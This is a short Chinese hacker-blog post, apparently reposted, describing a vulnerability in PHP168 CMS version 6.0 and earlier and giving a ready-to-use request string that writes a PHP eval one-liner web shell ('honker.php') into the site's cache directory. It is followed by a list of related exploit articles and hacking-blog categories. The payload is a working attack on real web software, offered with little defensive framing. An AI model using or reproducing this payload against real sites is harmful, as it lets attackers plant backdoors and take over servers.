PHP168 6.0及以下版本漏洞转自:鬼仔
危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]
本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/PHP168-6.0.html
Discuz! Plugin Crazy Star < = 2.0 Sql injection Vulnerability (2009-8-27 13:57:57)
乘风多用户PHP统计系统 v4.0 注射漏洞 (2009-6-16 16:21:14)
PHP漏洞挖掘技术 (2009-5-6 16:16:10)
Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit (2009-5-1 16:17:16)
ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability (2009-4-28 13:52:37)
Linux爆本地提权漏洞 请立即更新udev程序 (2009-4-25 1:8:8)
mypic v2.1 正式版 遍历文件漏洞 (2009-4-21 2:26:16)
ECMall本地文件包含漏洞 (2009-3-29 21:58:0)
Acute Control Panel 1.0.0 三个 SQL注入漏洞及利用 (2009-3-29 0:7:28)
Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit (2009-3-27 2:35:27)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
(A:)本站原创 (19) (D:)PHP程序漏洞 (43) (C:)ASP程序漏洞 (42) (E:)JSP程序漏洞 (1) (F:)CGI程序漏洞 (1) (G:)SQL数据库漏洞 (19) (H:)Oracle数据库漏洞 (8) (I:)第三方软件漏洞 (14) (J:)WINDOWS漏洞 (23) (K:)Linux漏洞 (12) (L:)入侵小技巧 (16) (N:)黑软武器集 (23) (M:)其他漏洞 (9) (O:)渗透技巧 (7) (P:)无线入侵 (5) (Q:)传统学习ASP (25) (I:)重新回温SQL (3) (S:)传统学习Javascript (11) (T:)杂七杂八 (4)